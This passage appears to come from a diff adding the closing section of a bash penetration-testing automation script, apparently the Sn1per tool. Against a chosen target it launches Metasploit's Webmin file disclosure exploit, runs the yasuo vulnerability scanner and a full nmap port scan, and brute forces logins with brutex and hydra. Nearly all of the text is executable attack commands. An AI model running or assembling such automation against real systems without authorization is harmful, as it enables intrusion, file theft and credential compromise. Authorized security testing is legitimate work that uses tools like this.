+	cutycapt --url=https://$TARGET:8888 --out=$LOOT_DIR/screenshots/$TARGET-port8888.jpg
+fi
+
+if [ -z "$port_10000" ];
+then
+	echo -e "$OKRED + -- --=[Port 10000 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 10000 opened... running tests...$RESET"
+	echo -e "$OKGREEN + -- ----------------------------=[Scanning For Common Vulnerabilities]=----- -- +$RESET"
+	echo -e "$OKGREEN + -- ----------------------------=[Launching Webmin File Disclosure Exploit]= -- +$RESET"
+	msfconsole -x "use auxiliary/admin/webmin/file_disclosure; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; exit;"
+fi
+
+if [ -z "$port_49152" ];
+then
+	echo -e "$OKRED + -- --=[Port 49152 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 49152 opened... running tests...$RESET"
+	$SUPER_MICRO_SCAN $TARGET
+fi
+
+echo -e "$OKGREEN + -- ----------------------------=[Scanning For Common Vulnerabilities]=----- -- +$RESET"
+cd $PLUGINS_DIR/yasuo
+ruby yasuo.rb -r $TARGET -b all
+cd $SNIPER_DIR
+
+if [ "$FULLNMAPSCAN" = "0" ]; then
+	echo -e "$OKGREEN + -- ----------------------------=[Skipping Full NMap Port Scan]=------------ -- +$RESET"
+else
+	echo -e "$OKGREEN + -- ----------------------------=[Performing Full NMap Port Scan]=---------- -- +$RESET"
+	nmap -T4 -sV -O -v -p 1-65355 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
+fi
+
+if [ "$AUTOBRUTE" = "0" ]; then
+	echo -e "$OKGREEN + -- ----------------------------=[Skipping Brute Force]=-------------------- -- +$RESET"
+else
+	echo -e "$OKGREEN + -- ----------------------------=[Running Brute Force]=--------------------- -- +$RESET"
+	brutex $TARGET
+	cd $INSTALL_DIR
+	rm -f hydra.restore
+	rm -f scan.log
+	echo ""
+fi
+
+rm -f $LOOT_DIR/.fuse_* 2> /dev/null
+
+echo -e "$OKGREEN + -- ----------------------------=[Done]=------------------------------------ -- +$RESET"
+exit 0